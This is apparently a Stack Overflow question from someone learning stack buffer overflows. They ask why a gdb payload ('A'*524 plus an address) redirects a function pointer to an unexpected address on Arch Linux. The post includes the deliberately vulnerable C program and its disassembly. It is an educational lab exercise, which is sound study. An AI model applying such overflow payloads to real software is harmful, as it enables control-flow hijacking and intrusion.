Why is my gdb converting to wrong hexadecimal value?

1
(gdb) run `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Starting program: /home/xxx/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\x55\x61\x55\x56')"`
Off to 0x56556155
Program received signal SIGSEGV, Segmentation fault.
0x56556155 in register_tm_clones ()


(gdb) run `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xcd\x61\x55\x56')"`
Off to 0x55618dc3
Program received signal SIGSEGV, Segmentation fault.
0x55618dc3 in ?? ()

When I include \x55\x61\x55\x56 in my payload, I get the segmentation fault at 0x56556155, but when I include \xcd\x61\x55\x56 in my payload, I get the segmentation fault at 0x55618dc3. I was thinking \xcd\x61\x55\x56 would give seg. fault at 0x565561cd. I can only reproduce this when I use gdb in Arch Linux. In Kali linux this works as intended and I was successfully able to run a function by overwriting EBP, but not in Arch linux.

another example of payload that doesn't work:

(gdb) run `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Starting program: /home/nepalidai/Documents/ethical_hacking/buffer_overflow/simplebuffer `python -c "print('A'*524+'\xaa\x61\x55\x56')"`
Off to 0x5561aac2
Program received signal SIGSEGV, Segmentation fault.
0x5561aac2 in ?? ()

source code:

#include <stdio.h>
#include <string.h>

int BUFFER=500;

void win(void){
    /*Win Condition
      We Want to jump here
    */
    printf("\n ===== Win ===== \n\n");
}

void lose(void){
    /* Lose Condition */
    printf("Current Memory Address is %p\n",lose);
    printf("Aim for %p\n", win);
    printf("Lose :(\n");
}

int main(int argc, char* argv[]){
    /* Main Function*/

    //Pointer to the lose function
    void (*fp)(void) = lose;

    char buffer[BUFFER];

    if (argc != 2){
    printf("Overflow the buffer\n");
    printf("Hint! Try `python -c \"print 'A'*100\"`\n");
    return -1;
    }

    memcpy(buffer, argv[1], strlen(argv[1]));
    printf("Off to %p\n",fp);
    fp();

    return 0;
}

disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   0x56556254 <+0>: lea    ecx,[esp+0x4]
   0x56556258 <+4>: and    esp,0xfffffff0
   0x5655625b <+7>: push   DWORD PTR [ecx-0x4]
   0x5655625e <+10>:    push   ebp
   0x5655625f <+11>:    mov    ebp,esp
   0x56556261 <+13>:    push   edi
   0x56556262 <+14>:    push   esi
   0x56556263 <+15>:    push   ebx
   0x56556264 <+16>:    push   ecx
   0x56556265 <+17>:    sub    esp,0x18
   0x56556268 <+20>:    call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x5655626d <+25>:    add    ebx,0x2d93
   0x56556273 <+31>:    mov    esi,ecx
   0x56556275 <+33>:    mov    eax,esp
   0x56556277 <+35>:    mov    edi,eax
   0x56556279 <+37>:    lea    eax,[ebx-0x2e08]
   0x5655627f <+43>:    mov    DWORD PTR [ebp-0x1c],eax
   0x56556282 <+46>:    mov    eax,DWORD PTR [ebx+0x28]
   0x56556288 <+52>:    lea    edx,[eax-0x1]
   0x5655628b <+55>:    mov    DWORD PTR [ebp-0x20],edx
   0x5655628e <+58>:    mov    edx,eax
   0x56556290 <+60>:    mov    eax,0x10
   0x56556295 <+65>:    sub    eax,0x1
   0x56556298 <+68>:    add    eax,edx
   0x5655629a <+70>:    mov    ecx,0x10
   0x5655629f <+75>:    mov    edx,0x0
   0x565562a4 <+80>:    div    ecx
   0x565562a6 <+82>:    imul   eax,eax,0x10
   0x565562a9 <+85>:    sub    esp,eax
   0x565562ab <+87>:    mov    eax,esp
   0x565562ad <+89>:    add    eax,0x0
   0x565562b0 <+92>:    mov    DWORD PTR [ebp-0x24],eax
   0x565562b3 <+95>:    cmp    DWORD PTR [esi],0x2
   0x565562b6 <+98>:    je     0x565562e3 <main+143>
   0x565562b8 <+100>:   sub    esp,0xc
   0x565562bb <+103>:   lea    eax,[ebx-0x1fb2]
   0x565562c1 <+109>:   push   eax
   0x565562c2 <+110>:   call   0x56556060 <puts@plt>
   0x565562c7 <+115>:   add    esp,0x10
   0x565562ca <+118>:   sub    esp,0xc
   0x565562cd <+121>:   lea    eax,[ebx-0x1f9c]
   0x565562d3 <+127>:   push   eax
   0x565562d4 <+128>:   call   0x56556060 <puts@plt>
   0x565562d9 <+133>:   add    esp,0x10
   0x565562dc <+136>:   mov    eax,0xffffffff
   0x565562e1 <+141>:   jmp    0x5655632e <main+218>
   0x565562e3 <+143>:   mov    eax,DWORD PTR [esi+0x4]
   0x565562e6 <+146>:   add    eax,0x4
   0x565562e9 <+149>:   mov    eax,DWORD PTR [eax]
   0x565562eb <+151>:   sub    esp,0xc
   0x565562ee <+154>:   push   eax
   0x565562ef <+155>:   call   0x56556070 <strlen@plt>
   0x565562f4 <+160>:   add    esp,0x10
   0x565562f7 <+163>:   mov    edx,DWORD PTR [esi+0x4]
   0x565562fa <+166>:   add    edx,0x4
   0x565562fd <+169>:   mov    edx,DWORD PTR [edx]
   0x565562ff <+171>:   sub    esp,0x4
   0x56556302 <+174>:   push   eax
   0x56556303 <+175>:   push   edx
   0x56556304 <+176>:   push   DWORD PTR [ebp-0x24]
   0x56556307 <+179>:   call   0x56556050 <memcpy@plt>
   0x5655630c <+184>:   add    esp,0x10
   0x5655630f <+187>:   sub    esp,0x8
   0x56556312 <+190>:   push   DWORD PTR [ebp-0x1c]
   0x56556315 <+193>:   lea    eax,[ebx-0x1f76]
   0x5655631b <+199>:   push   eax
   0x5655631c <+200>:   call   0x56556040 <printf@plt>
   0x56556321 <+205>:   add    esp,0x10
   0x56556324 <+208>:   mov    eax,DWORD PTR [ebp-0x1c]
   0x56556327 <+211>:   call   eax
   0x56556329 <+213>:   mov    eax,0x0
   0x5655632e <+218>:   mov    esp,edi
   0x56556330 <+220>:   lea    esp,[ebp-0x10]
   0x56556333 <+223>:   pop    ecx
   0x56556334 <+224>:   pop    ebx
   0x56556335 <+225>:   pop    esi
   0x56556336 <+226>:   pop    edi
   0x56556337 <+227>:   pop    ebp
   0x56556338 <+228>:   lea    esp,[ecx-0x4]
   0x5655633b <+231>:   ret
End of assembler dump.


(gdb) disassemble lose
Dump of assembler code for function win:
   0x565561cd <+0>: push   ebp
   0x565561ce <+1>: mov    ebp,esp
   0x565561d0 <+3>: push   ebx
   0x565561d1 <+4>: sub    esp,0x4
   0x565561d4 <+7>: call   0x5655633c <__x86.get_pc_thunk.ax>
   0x565561d9 <+12>:    add    eax,0x2e27
   0x565561de <+17>:    sub    esp,0xc
   0x565561e1 <+20>:    lea    edx,[eax-0x1ff8]
   0x565561e7 <+26>:    push   edx
   0x565561e8 <+27>:    mov    ebx,eax
   0x565561ea <+29>:    call   0x56556060 <puts@plt>
   0x565561ef <+34>:    add    esp,0x10
   0x565561f2 <+37>:    nop
   0x565561f3 <+38>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x565561f6 <+41>:    leave
   0x565561f7 <+42>:    ret
End of assembler dump.

(gdb) disassemble lose
Dump of assembler code for function lose:
   0x565561f8 <+0>: push   ebp
   0x565561f9 <+1>: mov    ebp,esp
   0x565561fb <+3>: push   ebx
   0x565561fc <+4>: sub    esp,0x4
   0x565561ff <+7>: call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556204 <+12>:    add    ebx,0x2dfc
   0x5655620a <+18>:    sub    esp,0x8
   0x5655620d <+21>:    lea    eax,[ebx-0x2e08]
   0x56556213 <+27>:    push   eax
   0x56556214 <+28>:    lea    eax,[ebx-0x1fe4]
   0x5655621a <+34>:    push   eax
   0x5655621b <+35>:    call   0x56556040 <printf@plt>
   0x56556220 <+40>:    add    esp,0x10
   0x56556223 <+43>:    sub    esp,0x8
   0x56556226 <+46>:    lea    eax,[ebx-0x2e33]
   0x5655622c <+52>:    push   eax
   0x5655622d <+53>:    lea    eax,[ebx-0x1fc6]
   0x56556233 <+59>:    push   eax
   0x56556234 <+60>:    call   0x56556040 <printf@plt>
   0x56556239 <+65>:    add    esp,0x10
   0x5655623c <+68>:    sub    esp,0xc
   0x5655623f <+71>:    lea    eax,[ebx-0x1fba]
   0x56556245 <+77>:    push   eax
   0x56556246 <+78>:    call   0x56556060 <puts@plt>
   0x5655624b <+83>:    add    esp,0x10
   0x5655624e <+86>:    nop
   0x5655624f <+87>:    mov    ebx,DWORD PTR [ebp-0x4]
   0x56556252 <+90>:    leave
   0x56556253 <+91>:    ret
End of assembler dump.

What am I doing wrong? I am very new to assembly language and bufferoverflow, please go easy on me.

c
assembly
gdb
buffer
overflow
asked on Stack Overflow Jan 20, 2021 by john • edited Jan 21, 2021 by (unknown user)

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0